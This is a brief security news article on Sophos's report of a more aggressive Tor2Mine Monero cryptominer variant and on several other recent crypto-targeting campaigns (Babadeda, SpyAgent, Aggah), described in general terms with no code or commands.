As Cryptocurrency has gained popularity amongst online users, the cybercriminals have realized the importance of cryptocurrency mining campaigns. Read on to know about it…
As cryptocurrency has grown in popularity among online users, cryptocurrency mining campaigns have taken centre stage in the threat landscape. Since cryptomining campaigns have proven to be financially lucrative for cybercriminals, they continue to develop new TTPs and malware strains. One such miner variant has reappeared, although this time it is more powerful, as discovered by Sophos.
The new Tor2Mine variant is a Monero miner that has been operating since at least 2019 and can take advantage of huge networks of worker machines.
The malware authors continue to upgrade the miner, as they find new strategies to escape detection and maintain persistence on hacked compromised emerge.
Working Mechanism
Tor2Mine disables anti-malware measures, deploys the payload, and steals Windows credentials using a PowerShell script.
Tor2Mine installs executables as a service and looks for other machines in the network for further propagation if it is able to gain admin privileges.
If it is unable to gain admin credentials, the miner can execute commands run as scheduled tasks filelessly.
When miners are present on a network, it means that more potentially dangerous intrusions are on the way. Tor2Mine also appears to be more aggressive than its competitors. It can only be removed with the help of endpoint protection and other anti-malware software once it has established persistence. Tor2Mine would continue to infect systems even if the C2 server goes offline due to its lateral movement functionality.
Latest Cryptomining Threats
Tor2Mine isn’t the only cryptominer to be wary of. Let’s take a look at some other recent incidents that are as equally threatening.
By hijacking Discord channels, the new Babadeda crypter has been discovered targeting the crypto, NFT, and DeFi communities. To make their payloads appear harmless, the allegedly Russian-based hackers are hiding them in application installers.
A campaign propagating the SpyAgent malware has been blamed for some recent cryptomining activity. The malware was discovered exploiting Safib Assistant, a legit Russian remote access tool. Fake cryptocurrency-related websites are used to spread the malware dropper.
Last month, researchers discovered a new Aggah campaign that used clipboard hijacking code to replace bitcoin addresses. In the attacks, Bitcoin, XMR, Ethereum, Doge, XLM, LTC, and XRP addresses, were used.
A Brief Conclusion
Cryptominers are less likely to target firms that quickly patch vulnerabilities on internet-facing systems, according to Sophos. As threats evolve, it is critical for organizations to stay ahead of the game by deploying strong cybersecurity protections.